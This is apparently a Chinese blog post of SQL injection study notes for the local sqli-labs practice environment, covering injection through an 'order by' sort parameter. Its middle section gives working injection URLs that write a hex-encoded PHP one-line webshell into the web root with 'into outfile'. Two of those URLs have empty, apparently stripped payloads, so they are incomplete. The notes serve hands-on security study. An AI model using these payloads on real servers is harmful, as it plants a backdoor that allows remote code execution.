sql注入笔记(4)

一、对order by sort进行注入:

(1)order by sort后面不能用 union select ,否则会出现报错:

Incorrect usage of UNION and ORDER BY

(2)没有引号包裹的时候若输入:?sort=111 会报错,但是我尝试了一下,此时输入?sort=111111111111111111111 反而返回正常了,很奇怪,记录一下;

(3)若 sort 被引号包裹,无论引号内是什么都可以查询出结果;

补充:

(1)left(string, num) 截取出 string 字符从左往右数前num个字符;

(2)right(string, num) 截取出 string 字符从右往左数前num个字符;

(3)lines teminated by 0x16string 通过 string 把每一行查询结果用string结尾;0x16string可以换做一句话木马;

http://127.0.0.1/Less-46/
?sort=1 into outfile "D:\\sqli-labs\\sqli-labs-master\\Less-46\\1.php" 
lines terminated by 
0x3c3f70687020406576616c28245f504f53545b227777225d293b203f3e--+

补充一句话木马的写入方式:
(1)
http://127.0.0.1/Less-1/?id=1' into outfile "D:\\sqli-labs\\sqli-labs-master\\Less-1\\ydyy1.php" lines terminated by ''--+

(2)
http://127.0.0.1/Less-1/?id=1' and (select '') into outfile "D:\\sqli-labs\\sqli-labs-master\\Less-1\\ydyy1.php"--+

(4)sql语句中,asc是按列升序排序,desc是按列降序排序;

select * from users order by id desc; 降序排序
select * from users order by id asc; 升序排序

(5)order by :

select * from users order by 1; 按第一列排序
select * from users order by 2; 按第二列排序

你可能感兴趣的:(笔记,java,c#)